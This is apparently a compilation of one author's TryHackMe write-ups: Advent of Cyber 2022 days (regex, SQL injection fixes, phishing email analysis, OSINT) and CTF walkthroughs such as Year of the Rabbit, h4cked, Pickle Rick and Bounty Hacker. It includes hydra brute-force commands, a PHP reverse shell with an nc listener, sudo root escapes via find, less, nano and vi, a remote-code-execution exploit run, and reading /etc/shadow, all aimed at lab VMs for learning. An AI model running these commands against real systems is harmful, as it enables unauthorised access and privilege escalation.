TryHackMe.com - Advent of Cyber 2022 - Day 17 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Day 17 covers topic of the Regular Expressions.

1. Question 1, Question 2
To answer first two questions you can use following regular expression:

^[a-zA-Z0-9]{6,12}$

2. Question 3, Question 4
Following regular expression will help you get answers:

^.+@.+\.com$

3. Question 5
Following regular expression will help you get answers:

lewisham44

4. Question 6
Following regular expression will help you get answers:

maxximax

5. Question 7
Following regular expression will help you get answers:

^.+@.+\.com$

6. Question 8, Question 9

^http(s)?.{3}(www)?.+..+$

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 16 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Today's task covers topic of SQL Injection (SQLi). SQL injection is the placement of malicious code in SQL statements, via web page input. Attackers will most probably try to querry the database return all of the users and passwords of the application if this vulnerability exist. Before you start with solving task you need to boot up VM in the task and attackbox for accessing the page. It will probably take a minute or two to boot up. After that we can open link to the developer page of the app we will try to fix. We login with provided credentials.

1. Question 1 - Fixing SQLi by Data Type Validation
First we use fix from description of the task to fix first and then second querry in the elf.php file after we have saved and press run we will get the first flag
2. Question 2 - Fixing SQLi Using Prepared Statements
With prepared statment described in the task we can quickly fix the search_toys.php and get second flag.
3. Question 3
To find the third flag we need to fix toy.php we can easly fix it same way we fix the elf.php with data type validation.
4. Question 4
For fixing the 4th vunlerability and getting forth flag we will need to fix the login.php. We do it with prepared statment as we did with second flag. Just make sure you use $username and $password instead of $q

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe - Year of the Rabbit - writeup

Year of the Rabbit is the beginer friendly CTF room on TryHackMe.com. How ever i strongly suggest that this isnt your very first CTF room. Because this one is pretty long and not so straight forward as you would suspect from easy room. Here is my "journey" through the VM we need to hack in and

1. step

As usually I started with nmap scan:

nmap -sS VM_IP

Output looks promissing with open ftp, ssh and http port.
I tried if ftp might allow us anonymous log in but without luck it doesnt allow. We will return to the ftp later.
2. step

In this step we will run our friend gobuster.

gobuster dir -u http://VM_IP -w /usr/share/wordlists/dirb/common.txt -x php,txt,html

Output directs us to the /assets folder where we find 2 files.
3. step

Well we got some text and a video. The text suggest that hint is in the video so i went for that but no luck. I tried looking around the web for hint and suggestion was to use burp suite. We use it to intercept the get request for page /sup3r_s3cr3t_fl4g.php in response we find the hidden folder.
4. step

Open the hidden folder we got in previous step we find picture of the girl. Hmm what could we do with it maybe some meta data.

strings hot_babe.png

Voila we get list of possible password and username for FTP access.
5. step

We use hydra tool:

hydra -l ftpuser - P possible_pass.txt ftp:/vm_ip

Hydra will run fast because of short list and you get log in to the ftp with username and password:

ftp VM_IP

We are prompted for credentials. After login we use ls and we see Eli's_Creds.txt. I have downloaded filed to attackbox:

get Eli's_Creds.txt

6. step

I have opened file on attackbox at first file looks like jibrish but I think I saw once this before.
I have looked around the web for brainfuck language. I have confirmed that this is brainfuck and I used this decoder
This one gave us ssh credentials.

ssh username@VM_IP

We enter password we got with decoded and the login we get hint were to look for flag? or soemthing else? we have found another credendetials.

su another_username

After logged in new account I checked home folder of user where you find the user.txt flag.
7. step

Ok we got user flag, lets try to escalate priviliges. We check if we can run any command as root user.

sudo -l

From output I saw you can run vi program. I headed over to the GTFObins and see what command will help us to get the root access.

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

then we ctrl + c and we type in !/bin/sh and voila we have root access.

cd /root

ls

cat root.txt

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 6 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Here are my solutions for the Day 6, if anyone gets stuck. Open the email in text editor and can solve most of the questions with analysis

1. Q1

Answer hides in 4th line of the email file - From:
2. Q2

Answer hides in 14th line of the email file - Return-Path:
3. Q3

Answer hides in 4th line of the email file.
4. Q4

Answer hides in 11th line of the email file - X-spam score
5. Q5

Copy value from message ID to the CyberChef and decode from base64. Output is the answer to this question.
6. Q6

GO to EmailRep and enter the sender email. Answer will appear right below the entry box where you have entered email.
7. Q7

Open terminal and move to the eml_attachments fodler on desktop and run:

sha256sum file_name

to get hash value which is the answer of Q7.
8. Q8

Visit VirusTotal site and enter attachment's hash
9. Q9

Visit InQuest site, enter attachment's hash and look for answer on the site

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 3 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Here are my solutions for the Day 3, if anyone gets stuck. Today's assinment is covering the OSINT technics.
OSINT is gathering and analysing publicly accessable data for intel purposes. For example:

• the internet
• mass media
• journals and research pappers
• photos
• location informations

1. Q1

To anwser the first question you will need to visit who.is to get info about domain in question.
2. Q2

I was looking up on github to find source repository. What is the name of file where would you usally save settings ?
3. Q3

I was looking up on github to find source repository. What is the name of file where would you usally save settings ?
4. Q4

For succesfully answering this one you have to search through the file we talk in Q2 and Q3.
5. Q5

For succesfully answering this one you have to search through the file we talk in Q2 and Q3

I hope anyone who gets stuck finds it helpful AudiTTRSi

TryHackMe - h4cked - walkthrough

H4cked is one of easy room on the TryHackMe.com In task 1 we are faced by pcap file of the attack on the VM. Most of the answers in Task 1 are found from pcap file which you open with wireshark. Task 2 in this task you try to regain access to the VM same way as hacker did in task 1.

1. Step

We use hydra to crack new password with following command

hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://target_IP

2. Step

We log to the ftp and download the shell.php (get shell.php - is the command) and change IP and port to our attack box and upload it back (put shell.php)
3. Step
Before move to the starting the php script we need to start nc listener on attacking box with


nc -lvnp port_number

4. Step
Now we are ready to start php script shell.php from browser:

IP_target_machine/shell.php

5. Step
We get spawned reverse shell in terminal, with whoami command we check which user we have, then we can use

su jenny

and log in with pass we cracked before with hydra
6. Step
After that we can use

sudo su

and we have root access with this we can read root flag.

I hope someone stucked in any step of solving this room finds this walkthrough useful.

TryHackMe - Pickle Rick - walkthrough

Pickle Rick - A Rick and Morty CTF. Help turn Rick back into a human!
It is a CTF room on TryHackMe page if you are fan of Rick and Morty cartoon you should defently try to solve it. It is not that hard and you can solve it pretty fast.

1. step:
Start target machine that you will try to exploit and start Attackbox machine.
2. step:
As usually we try with nmap scan to check what ports are open on target machine with command:


nmap -sC -sV Target_IP


With only 2 ports open we check the web page
3. step:
There is nothing much on the page but is it? We check the page source code where we find username which might be useful in next steps
4. step:
With use of the gobuster we scan webpage to find hidden files or directories I have used following command:


gobuster dir -t 40 -u 10.10.151.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x html,php,txt -t 60



5. step:
We find the login.php access page but we are missing password. We check the robot.txt file and we get possible password candidate for login. Which turns out that it is actual username and pass.

6. step:
We end up on command panel where we can write some command like ls and we can see interesting files there with Q1 answer ingridient. We try opening filed with cat command File_name.txt but it doesnt allow us.
We try with less command File_name.txt voila we opened it and we can answer first Q1.
7. step:
In this step we check the clue.txt file which says that we should look around directories for second ingridient. We try to get to other directories in /home/rick/ we find the file second ingridients. Since the spaces in files names and linux arent good friends we need to use less command like this:


less '/home/rick/second ingredients'


And voila we have 2nd ingredient and we can answer the Q2.
8. step:
with command

sudo -l

we check what we can run as root.
9. step:
we can try

sudo ls -la /root

and we find 3rd.txt
10. step:
Since we cannot open file in it's folder we can try copying to other directory and change permissions:


sudo cp /root/3rd.txt /var/www/html/ && chmod 777 3rd.txt

11. step:
In browser open file via Target_IP/3rd.txt. and we can answer last Q3 in this room.

I hope anyone who gets stucked finds this writeup helpful.

TryHackMe - Linux PrivEsc - Task 6 - Privilege Escalation : Sudo

This is probably one of the easiest type of PrivEsc tasks.
With command :

sudo -l

We check what services we can run as root. adn with this info we can answer Q1
From output of the command we see 3 services/programs that we can run as root. Now that we have this information we can head over to the GTFObins To check for each service/program that we can gain root access to system.

• Find

sudo find . -exec /bin/sh \; -quit

• Less

sudo less /etc/profile
!/bin/sh

• nano

sudo nano
^R^X
reset; sh 1>&0 2>&0

Note about getting root via nano one command at the time ^R - is CTRL + R and ^X CTRL + X
To answer Q2 we run:

find / -type f -name flag2.txt 2>/dev/null

that we find path to the flag2.txt file
To answer Q3 we neet to check GTFObins to get command.
To answer Q4 we open /etc/shadow to find answer. I hope this post is helpfull for anyone stuck at solving this task.

TryHackMe - Bounty Hacker -walkthrough

Bounty Hacker is one of easy rooms on TryHackMe.com
I was able to finish it up in couple of minutes with some reference from other similar rooms like this one.

1. First step

In this step you deploy the target VM and start Attackbox if you dont have it up already. It takes a minute or two to start up.


2. Second step

We use nmap to scan target VM.

nmap -A -T4 _IP_target_VM


Command takes some time to scan and display us back what ports are open. You can see 3 ports open 21 with FTP, 22 ssh and 80 apache server.


3. Third step

As FTP is open and it allows you to connect with anonymous user we try to connect to FTP server on target machine with command:

FTP IP_target_VM


When prompted for username you enter anonymous. We check what files we can find on server there are 2 files. One cointains note from one user this is also answer to the Q3 and other is list of what it looks like passwords. You can download files by command:


get file_name



4. Forth step

We will use hydra brute forcing tool to check if any passwords from list we could obtain from FTP server. I used following command:

hydra target_VM_IP ssh -l lin -P path_to_the_password_list -s 22 -vV


SSH user i used the one i found in file on FTP server.


5. Fifth step

After Hydra finish its work and you get correct pass you can ssh to the target VM.


6. Sixth step

When we are logged in server I tried to find user flag and write location of the file into user-flag file:

find / -type f -name user.txt 2>/dev/nul > user-flag 



7. Seventh step

In this step we check what command can current user run as sudo. We use:

sudo -l


As we see now only one command we can run. We had over to the GTFObins and check what command to run. Copy paste command to the command line and voila we have root access.
8. Eighth step

Last step is to find the root.txt file we write its location to root-flag file:

find / -type f -name root.txt 2>/dev/null > /tmp/root-flag 

I hope this helps to the people who might get stucked during solving this room.

TryHackMe - Exploit Vulnerabilities module - Task 5 - Practical: Manual Exploitation

This is my first writeup/walkthrough post for the TryHackMe website.
TryHackMe is online platform for learning cyber security, using hands-on exercises and labs.
This post refers to the Task 5 - Practical: Manual Explotaition which is part of the module of Exploit Vulnerabilities on THM JR penetration tester course.
Task 5 is final task in this submodule and is to show practical example of things you learned through the previous tasks.

First step is to start VM that you will try to exploit as description says it requires few minutes to boot up. If you will use Attackbox on their site don't forget to start it also.

Second step To answer the Q1 you need to just open website that is hosted on VM you started in first step. Scroll down to the bottom of the page and voila you will find name version of the website.

Third step Now that you know website version you will need to find the way to exploit and gain access to it. You could also online tools but this Task 5 one aims towards use of the searchsploit tool that is installed and ready to use in Attackbox machine. we use following command:

searchsploit online book store

We get 4 different results, but we choose last from the list wich offers remote code execution.


Forth step - To start exploit you will use following command:

python name_of_script.py VM_IP

Since I was not in the same directory as exploit script I got error that exploit script was not found, so I used:

locate 47887.py

With that I found correct location of the exploit script and then i could ran exploit script correctly without errors:

python path_to_the_exploit_/47887.py VM_ip_Address

You are then only prompted to continue with exploit and in matter of seconds you get access to the shell of the VM.

Fifth step - finding flag.txt file and answer to the Q3 of this task.
This did not require much of the search since file is located in current folder and I used

cat flag.txt

To display flag.txt file content. I hope that this post is helpful for anyone trying to solve this challenge. audittrsi